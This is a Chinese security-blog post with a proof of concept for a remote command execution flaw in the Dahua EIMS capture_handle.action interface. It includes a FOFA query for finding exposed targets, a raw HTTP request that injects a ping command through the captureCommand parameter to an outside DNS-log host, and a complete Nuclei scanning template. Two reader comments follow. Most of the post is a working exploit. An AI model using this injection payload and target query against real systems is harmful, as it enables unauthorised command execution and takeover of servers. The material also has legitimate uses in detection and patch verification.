大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
title="EIMS"
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20bbb.z8o3wopy.dnslog.pw%20index.pcap HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/
id: dahua-EIMS-RCE
info:
name: 大华 EIMS-capture_handle.action接口远程命令执行
author: nobody
severity: critical
description: |
大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限.
impact: |
攻击者可利用该漏洞远程执行命令
remediation: |
升级版本,打补丁,白名单访问
metadata:
verified: true
max-request: 3
fofa-query: title="EIMS"
tags: dahua,rce
requests:
- raw:
- |
@timeout:30s
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
- type: word
part: body
words:
- "success"
- type: status
status:
- 200
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
zbs
发表于 9个月前
挺好,有无详细信息
评论列表
加载数据中...
杜星翰
发表于 9个月前
这是做代审审计出来的吗?
评论列表
加载数据中...